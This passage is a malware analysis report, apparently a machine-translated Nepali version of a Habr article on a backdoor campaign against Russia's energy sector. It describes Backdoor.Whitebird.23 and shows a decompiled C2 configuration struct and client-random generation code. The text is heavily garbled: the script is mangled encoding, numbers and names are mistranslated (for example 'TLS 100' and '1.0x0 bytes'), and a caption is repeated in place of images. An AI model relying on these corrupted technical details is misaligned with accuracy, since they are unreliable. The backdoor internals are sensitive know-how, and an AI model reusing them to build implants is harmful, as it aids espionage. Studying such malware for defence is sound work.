рд╕реБрд░реБ рдЧрд░реНрджрдЫред

рд╕рдЮреНрдЪрд╛рд▓рди рд╕рд┐рджреНрдзрд╛рдиреНрддрд╣рд░реВрдХреЛ рдердк рдкреВрд░реНрдг рд╡рд┐рд╡рд░рдг BackDoor.Siggen2.3238 рд╣рд╛рдореНрд░реЛ рдорд╛ рдЫ рднрд╛рдЗрд░рд╕ рдкреБрд╕реНрддрдХрд╛рд▓рдп.

Backdoor.Whitebird.23

рджреЛрд╕реНрд░реЛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдмреНрдпрд╛рдХрдбреЛрд░рдХреЛ рдкрд░рд┐рдорд╛рд░реНрдЬрди рд╣реЛред рд╡реНрд╣рд╛рдЗрдЯрдмрд░реНрдб рдмреНрдпрд╛рдХрдбреЛрд░, рдХрдЬрд╛рдХрд┐рд╕реНрддрд╛рдирдХреЛ рд╕рд░рдХрд╛рд░реА рдПрдЬреЗрдиреНрд╕реАрд╕рдБрдЧ рднрдПрдХреЛ рдШрдЯрдирд╛рдмрд╛рдЯ рд╣рд╛рдореАрд▓рд╛рдИ рдкрд╣рд┐рд▓реЗ рдиреИ рдерд╛рд╣рд╛ рдЫред рдпреЛ рд╕рдВрд╕реНрдХрд░рдг C++ рдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдЫ рд░ рджреБрдмреИ 32-bit рд░ 64-bit Windows рдЕрдкрд░реЗрдЯрд┐рдЩ рд╕рд┐рд╕реНрдЯрдорд╣рд░реВрдорд╛ рдЪрд▓рд╛рдЙрди рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХреЛ рдЫред

рдпрд╕ рдкреНрд░рдХрд╛рд░рдХрд╛ рдзреЗрд░реИ рдХрд╛рд░реНрдпрдХреНрд░рдорд╣рд░реВ рдЬрд╕реНрддреИ, Backdoor.Whitebird.23 рдХрдиреНрдЯреНрд░реЛрд▓ рд╕рд░реНрднрд░ рд░ рд╕рдВрдХреНрд░рдорд┐рдд рдХрдореНрдкреНрдпреБрдЯрд░рдХреЛ рдЕрдирд╛рдзрд┐рдХреГрдд рдирд┐рдпрдиреНрддреНрд░рдгрд╕рдБрдЧ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдЬрдбрд╛рди рд╕реНрдерд╛рдкрдирд╛ рдЧрд░реНрди рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХреЛред рдбреНрд░рдкрд░ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╕рдореНрдЭреМрддрд╛ рдкреНрд░рдгрд╛рд▓реАрдорд╛ рд╕реНрдерд╛рдкрдирд╛ рдЧрд░рд┐рдпреЛ BackDoor.Siggen2.3244.

рд╣рд╛рдореАрд▓реЗ рдЬрд╛рдБрдЪ рдЧрд░реЗрдХреЛ рдирдореВрдирд╛ рджреБрдИ рдирд┐рд░реНрдпрд╛рддрдХреЛ рд╕рд╛рде рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреБрд╕реНрддрдХрд╛рд▓рдп рдерд┐рдпреЛ:

  • рдЧреБрдЧрд▓ рдкреНрд▓реЗ
  • рдЯреЗрд╕реНрдЯ рдЧрд░реНрдиреБрд╣реЛрд╕реНред

рдпрд╕рдХреЛ рдХрд╛рдордХреЛ рд╕реБрд░реБрдорд╛, рдпрд╕рд▓реЗ рдмрд╛рдЗрдЯ 0x99 рдХреЛ рд╕рд╛рде XOR рдЕрдкрд░реЗрд╢рдирдорд╛ рдЖрдзрд╛рд░рд┐рдд рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдмреНрдпрд╛рдХрдбреЛрд░ рдмрдбреАрдорд╛ рд╣рд╛рд░реНрдбрд╡рд╛рдЗрд░ рдЧрд░рд┐рдПрдХреЛ рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рдирд▓рд╛рдИ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдЧрд░реНрджрдЫред рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рди рдпрд╕реНрддреЛ рджреЗрдЦрд┐рдиреНрдЫ:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

рдпрд╕рдХреЛ рдирд┐рд░рдиреНрддрд░ рд╕рдЮреНрдЪрд╛рд▓рди рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдЧрд░реНрди, рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рдлрд┐рд▓реНрдбрдорд╛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдорд╛рди рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрджрдЫ рдХрд╛рдо_рдШрдгреНрдЯрд╛ рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рдирд╣рд░реВред рдлрд┐рд▓реНрдбрд▓реЗ 1440 рдмрд╛рдЗрдЯрд╣рд░реВ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫ, рдЬрд╕рд▓реЗ рдорд╛рдирд╣рд░реВ 0 рд╡рд╛ 1 рд▓рд┐рдиреНрдЫ рд░ рджрд┐рдирдорд╛ рдкреНрд░рддреНрдпреЗрдХ рдШрдгреНрдЯрд╛рдХреЛ рдкреНрд░рддреНрдпреЗрдХ рдорд┐рдиреЗрдЯ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдЧрд░реНрджрдЫред рдкреНрд░рддреНрдпреЗрдХ рдиреЗрдЯрд╡рд░реНрдХ рдЗрдиреНрдЯрд░рдлреЗрд╕рдХреЛ рд▓рд╛рдЧрд┐ рдЫреБрдЯреНрдЯреИ рдереНрд░реЗрдб рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджрдЫ рдЬрд╕рд▓реЗ рдЗрдиреНрдЯрд░рдлреЗрд╕ рд╕реБрдиреНрджрдЫ рд░ рд╕рдВрдХреНрд░рдорд┐рдд рдХрдореНрдкреНрдпреБрдЯрд░рдмрд╛рдЯ рдкреНрд░реЛрдХреНрд╕реА рд╕рд░реНрднрд░рдорд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдкреНрдпрд╛рдХреЗрдЯрд╣рд░реВ рдЦреЛрдЬреНрдЫред рдЬрдм рдпрд╕реНрддреЛ рдкреНрдпрд╛рдХреЗрдЯ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЗрдиреНрдЫ, рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рдпрд╕рдХреЛ рд╕реВрдЪреАрдорд╛ рдкреНрд░реЛрдХреНрд╕реА рд╕рд░реНрднрд░рдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рдердкреНрдЫред рдердк рд░реВрдкрдорд╛, WinAPI рдорд╛рд░реНрдлрдд рдкреНрд░реЛрдХреНрд╕реАрдХреЛ рдЙрдкрд╕реНрдерд┐рддрд┐рдХреЛ рд▓рд╛рдЧрд┐ рдЬрд╛рдБрдЪ рдЧрд░реНрджрдЫ InternetQueryOptionW.

рдХрд╛рд░реНрдпрдХреНрд░рдорд▓реЗ рд╣рд╛рд▓рдХреЛ рдорд┐рдиреЗрдЯ рд░ рдШрдгреНрдЯрд╛ рдЬрд╛рдБрдЪ рдЧрд░реНрджрдЫ рд░ рдлрд┐рд▓реНрдбрдорд╛ рдбрд╛рдЯрд╛рд╕рдБрдЧ рддреБрд▓рдирд╛ рдЧрд░реНрджрдЫ рдХрд╛рдо_рдШрдгреНрдЯрд╛ рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рдирд╣рд░реВред рдпрджрд┐ рджрд┐рдирдХреЛ рд╕рдореНрдмрдиреНрдзрд┐рдд рдорд┐рдиреЗрдЯрдХреЛ рд▓рд╛рдЧрд┐ рдорд╛рди рд╢реВрдиреНрдп рдЫреИрди рднрдиреЗ, рддреНрдпрд╕рдкрдЫрд┐ рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рд╕рдБрдЧ рдЬрдбрд╛рди рд╕реНрдерд╛рдкрд┐рдд рд╣реБрдиреНрдЫред

рд╕рд░реНрднрд░рдорд╛ рдЬрдбрд╛рди рд╕реНрдерд╛рдкрдирд╛ рдЧрд░реНрдирд╛рд▓реЗ рдХреНрд▓рд╛рдЗрдиреНрдЯ рд░ рд╕рд░реНрднрд░ рдмреАрдЪрдХреЛ TLS рд╕рдВрд╕реНрдХрд░рдг 1.0 рдкреНрд░реЛрдЯреЛрдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЬрдбрд╛рдирдХреЛ рд╕рд┐рд░реНрдЬрдирд╛рд▓рд╛рдИ рдЕрдиреБрдХрд░рдг рдЧрд░реНрджрдЫред рдмреНрдпрд╛рдХрдбреЛрд░рдХреЛ рд╢рд░реАрд░рдорд╛ рджреБрдИрд╡рдЯрд╛ рдмрдлрд░рд╣рд░реВ рдЫрдиреНред

рдкрд╣рд┐рд▓реЛ рдмрдлрд░рд▓реЗ TLS 1.0 рдХреНрд▓рд╛рдЗрдиреНрдЯ рд╣реЗрд▓реЛ рдкреНрдпрд╛рдХреЗрдЯ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫред

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рджреЛрд╕реНрд░реЛ рдмрдлрд░рдорд╛ 1.0x0 рдмрд╛рдЗрдЯреНрд╕рдХреЛ рдХреБрдЮреНрдЬреА рд▓рдореНрдмрд╛рдЗрдХреЛ рд╕рд╛рде TLS 100 рдХреНрд▓рд╛рдЗрдиреНрдЯ рдХреБрдЮреНрдЬреА рдПрдХреНрд╕рдЪреЗрдиреНрдЬ рдкреНрдпрд╛рдХреЗрдЯрд╣рд░реВ, рдкрд░рд┐рд╡рд░реНрддрди рд╕рд╛рдЗрдлрд░ рд╕реНрдкреЗрдХ, рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╣реНрдпрд╛рдиреНрдбрд╕реЗрдХ рд╕рдиреНрджреЗрд╢ рд╕рдорд╛рд╡реЗрд╢ рдЫрдиреНред

рд╣рд╛рдореА рд░реВрд╕реА рдЗрдиреНрдзрди рд░ рдКрд░реНрдЬрд╛ рдкрд░рд┐рд╕рд░рдорд╛ рд▓рдХреНрд╖рд┐рдд рдЬрд╛рд╕реВрд╕ рдЖрдХреНрд░рдордгрдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрджреИрдЫреМрдВ

рдХреНрд▓рд╛рдЗрдиреНрдЯ рд╣реЗрд▓реЛ рдкреНрдпрд╛рдХреЗрдЯ рдкрдард╛рдЙрдБрджрд╛, рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рд╣рд╛рд▓рдХреЛ рд╕рдордпрдХреЛ 4 рдмрд╛рдЗрдЯрд╣рд░реВ рд░ рдХреНрд▓рд╛рдЗрдиреНрдЯ рдЕрдирд┐рдпрдорд┐рдд рдлрд┐рд▓реНрдбрдорд╛ 28 рдмрд╛рдЗрдЯрд╣рд░реВ рд╕реНрдпреВрдбреЛ-рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдбреЗрдЯрд╛ рд▓реЗрдЦреНрдЫ, рдирд┐рдореНрди рд░реВрдкрдорд╛ рдЧрдгрдирд╛ рдЧрд░рд┐рдПрдХреЛ рдЫ:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

рдкреНрд░рд╛рдкреНрдд рдкреНрдпрд╛рдХреЗрдЯ рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рдорд╛ рдкрдард╛рдЗрдиреНрдЫред рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ (рд╕рд░реНрднрд░ рд╣реЗрд▓реЛ рдкреНрдпрд╛рдХреЗрдЯ) рдЬрд╛рдБрдЪ рдЧрд░реНрджрдЫ:

  • TLS рдкреНрд░реЛрдЯреЛрдХрд▓ рд╕рдВрд╕реНрдХрд░рдг 1.0 рд╕рдВрдЧ рдЕрдиреБрдкрд╛рд▓рди;
  • рдЯрд╛рдЗрдорд╕реНрдЯреНрдпрд╛рдореНрдкрдХреЛ рдкрддреНрд░рд╛рдЪрд╛рд░ (рд░реЗрдиреНрдбрдо рдбрд╛рдЯрд╛ рдкреНрдпрд╛рдХреЗрдЯ рдлрд┐рд▓реНрдбрдХреЛ рдкрд╣рд┐рд▓реЛ 4 рдмрд╛рдЗрдЯрд╣рд░реВ) рд╕рд░реНрднрд░рджреНрд╡рд╛рд░рд╛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░рд┐рдПрдХреЛ рдЯрд╛рдЗрдорд╕реНрдЯреНрдпрд╛рдореНрдкрдорд╛ рдЧреНрд░рд╛рд╣рдХрджреНрд╡рд╛рд░рд╛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ;
  • рдХреНрд▓рд╛рдЗрдиреНрдЯ рд░ рд╕рд░реНрднрд░рдХреЛ рдЕрдирд┐рдпрдорд┐рдд рдбреЗрдЯрд╛ рдХреНрд╖реЗрддреНрд░рдорд╛ рдЯрд╛рдЗрдорд╕реНрдЯреНрдпрд╛рдореНрдк рдкрдЫрд┐ рдкрд╣рд┐рд▓реЛ 4 рдмрд╛рдЗрдЯрд╣рд░реВрдХреЛ рдорд┐рд▓рд╛рдиред

рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдорд┐рд▓рд╛рдирдХреЛ рдЕрд╡рд╕реНрдерд╛рдорд╛, рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рдХреНрд▓рд╛рдЗрдиреНрдЯ рдХреБрдЮреНрдЬреА рдПрдХреНрд╕рдЪреЗрдиреНрдЬ рдкреНрдпрд╛рдХреЗрдЯ рддрдпрд╛рд░ рдЧрд░реНрджрдЫред рдпреЛ рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдпрд╕рд▓реЗ рдХреНрд▓рд╛рдЗрдиреНрдЯ рдХреБрдЮреНрдЬреА рдПрдХреНрд╕рдЪреЗрдиреНрдЬ рдкреНрдпрд╛рдХреЗрдЬрдорд╛ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдЮреНрдЬреАрд▓рд╛рдИ рдкрд░рд┐рдорд╛рд░реНрдЬрди рдЧрд░реНрджрдЫ, рд╕рд╛рдереИ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╣реНрдпрд╛рдиреНрдбрд╕реЗрдХ рд╕рдиреНрджреЗрд╢ рдкреНрдпрд╛рдХреЗрдЬрдорд╛ рдЗрдиреНрдХреНрд░рд┐рдкреНрд╕рди IV рд░ рдЗрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдбрд╛рдЯрд╛ред

рдмреНрдпрд╛рдХрдбреЛрд░рд▓реЗ рддреНрдпрд╕рдкрдЫрд┐ рдЖрджреЗрд╢ рд░ рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рдмрд╛рдЯ рдкреНрдпрд╛рдХреЗрдЯ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрджрдЫ, рдЬрд╛рдБрдЪ рдЧрд░реНрджрдЫ рдХрд┐ TLS рдкреНрд░реЛрдЯреЛрдХрд▓ рд╕рдВрд╕реНрдХрд░рдг 1.0 рдЫ, рд░ рддреНрдпрд╕рдкрдЫрд┐ рдЕрд░реНрдХреЛ 54 рдмрд╛рдЗрдЯрд╣рд░реВ (рдкреНрдпрд╛рдХреЗрдЯрдХреЛ рдореБрдЦреНрдп рднрд╛рдЧ) рд╕реНрд╡реАрдХрд╛рд░ рдЧрд░реНрджрдЫред рдпрд╕рд▓реЗ рдЬрдбрд╛рди рд╕реЗрдЯрдЕрдк рдкреВрд░рд╛ рдЧрд░реНрджрдЫред

рд╕рдЮреНрдЪрд╛рд▓рди рд╕рд┐рджреНрдзрд╛рдиреНрддрд╣рд░реВрдХреЛ рдердк рдкреВрд░реНрдг рд╡рд┐рд╡рд░рдг Backdoor.Whitebird.23 рд╣рд╛рдореНрд░реЛ рдорд╛ рдЫ рднрд╛рдЗрд░рд╕ рдкреБрд╕реНрддрдХрд╛рд▓рдп.

рдирд┐рд╖реНрдХрд░реНрд╖ рд░ рдирд┐рд╖реНрдХрд░реНрд╖

рдХрд╛рдЧрдЬрд╛рддрд╣рд░реВ, рдорд╛рд▓рд╡реЗрдпрд░, рд░ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдХреЛ рд╡рд┐рд╢реНрд▓реЗрд╖рдгрд▓реЗ рд╣рд╛рдореАрд▓рд╛рдИ рд╡рд┐рд╢реНрд╡рд╛рд╕рдХрд╛ рд╕рд╛рде рднрдиреНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫ рдХрд┐ рдЖрдХреНрд░рдордг рдЪрд┐рдирд┐рдпрд╛рдБ APT рд╕рдореВрд╣рд╣рд░реВ рдордзреНрдпреЗ рдПрдХрджреНрд╡рд╛рд░рд╛ рддрдпрд╛рд░ рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛред рд╕рдлрд▓ рдЖрдХреНрд░рдордгрдХреЛ рдШрдЯрдирд╛рдорд╛ рдкреАрдбрд┐рддрдХреЛ рдХрдореНрдкреНрдпреБрдЯрд░рдорд╛ рд╕реНрдерд╛рдкрд┐рдд рдЧрд░рд┐рдПрдХрд╛ рдмреНрдпрд╛рдХрдбреЛрд░рд╣рд░реВрдХреЛ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛рд▓рд╛рдИ рдзреНрдпрд╛рдирдорд╛ рд░рд╛рдЦреНрджреИ, рд╕рдВрдХреНрд░рдордгрд▓реЗ рдХрдореНрддреАрдорд╛ рдкрдирд┐ рдЖрдХреНрд░рдордгрдХрд╛рд░реА рд╕рдВрд╕реНрдерд╛рд╣рд░реВрдХреЛ рдХрдореНрдкреНрдпреБрдЯрд░рдмрд╛рдЯ рдЧреЛрдкреНрдп рдЬрд╛рдирдХрд╛рд░реАрдХреЛ рдЪреЛрд░реАрдорд╛ рдкреБрдЧреНрдЫред

рдердк рд░реВрдкрдорд╛, рдПрдХ рдзреЗрд░реИ рд╕рдореНрднрд╛рд╡рд┐рдд рдкрд░рд┐рджреГрд╢реНрдп рд╕реНрдерд╛рдиреАрдп рд╕рд░реНрднрд░рд╣рд░реВрдорд╛ рд╡рд┐рд╢реЗрд╖ рдкреНрд░рдХрд╛рд░реНрдпрдХреЛ рд╕рд╛рде рд╡рд┐рд╢реЗрд╖ рдЯреНрд░реЛрдЬрдирд╣рд░реВрдХреЛ рд╕реНрдерд╛рдкрдирд╛ рд╣реЛред рдпреА рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХрд╣рд░реВ, рдореЗрд▓ рд╕рд░реНрднрд░рд╣рд░реВ, рдЗрдиреНрдЯрд░рдиреЗрдЯ рдЧреЗрдЯрд╡реЗрд╣рд░реВ, рдЖрджрд┐ рд╣реБрди рд╕рдХреНрдЫрдиреНред рд╣рд╛рдореАрд▓реЗ рдЙрджрд╛рд╣рд░рдгрдорд╛ рджреЗрдЦреНрди рд╕рдХреНрдЫреМрдВред рдХрдЬрд╛рдХрд┐рд╕реНрддрд╛рди рдорд╛ рдШрдЯрдирд╛, рддреНрдпрд╕реНрддрд╛ рд╕рд░реНрднрд░рд╣рд░реВ рд╡рд┐рднрд┐рдиреНрди рдХрд╛рд░рдгрд▓реЗ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рд╡рд┐рд╢реЗрд╖ рдЪрд╛рд╕реЛрдХреЛ рд╡рд┐рд╖рдп рд╣реБрдиреНред

рд╕реНрд░реЛрдд: www.habr.com

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдердкреНрди